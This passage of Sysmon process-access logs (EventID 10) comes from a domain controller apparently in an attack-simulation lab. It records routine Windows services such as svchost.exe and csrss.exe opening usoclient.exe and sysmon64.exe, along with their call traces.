73|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.757","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","SourceProcessId":"1144","SourceThreadId":"2084","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-040E-5F25-0000-0010B6230B00}","TargetProcessId":"4488","TargetImage":"C:\\Windows\\system32\\usoclient.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|c:\\windows\\system32\\UBPM.dll+a711|c:\\windows\\system32\\UBPM.dll+f974|c:\\windows\\system32\\UBPM.dll+cd3c|c:\\windows\\system32\\UBPM.dll+d305|c:\\windows\\system32\\UBPM.dll+dc05|c:\\windows\\system32\\UBPM.dll+e91d|c:\\windows\\system32\\UBPM.dll+e12a|c:\\windows\\system32\\UBPM.dll+dd82|c:\\windows\\system32\\EventAggregation.dll+3e22|c:\\windows\\system32\\EventAggregation.dll+389a|c:\\windows\\system32\\EventAggregation.dll+332f|c:\\windows\\system32\\EventAggregation.dll+2e28|C:\\Windows\\SYSTEM32\\ntdll.dll+64ed5|C:\\Windows\\SYSTEM32\\ntdll.dll+64bdd|C:\\Windows\\SYSTEM32\\ntdll.dll+64a40|C:\\Windows\\SYSTEM32\\ntdll.dll+45b70|C:\\Windows\\SYSTEM32\\ntdll.dll+2a073|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6087,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.757\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-040E-5F25-0000-0010B6230B00}\r\nTargetProcessId: 4488\r\nTargetImage: C:\\Windows\\system32\\usoclient.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.757","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-040E-5F25-0000-0010B6230B00}","TargetProcessId":"4488","TargetImage":"C:\\Windows\\system32\\usoclient.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6088,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.757\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.757","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6089,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.757\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.757","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6090,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.757\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.757","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6091,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.757\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.757","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6092,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.757\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.757","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6093,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.757\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.757","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6094,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.757\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.757","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
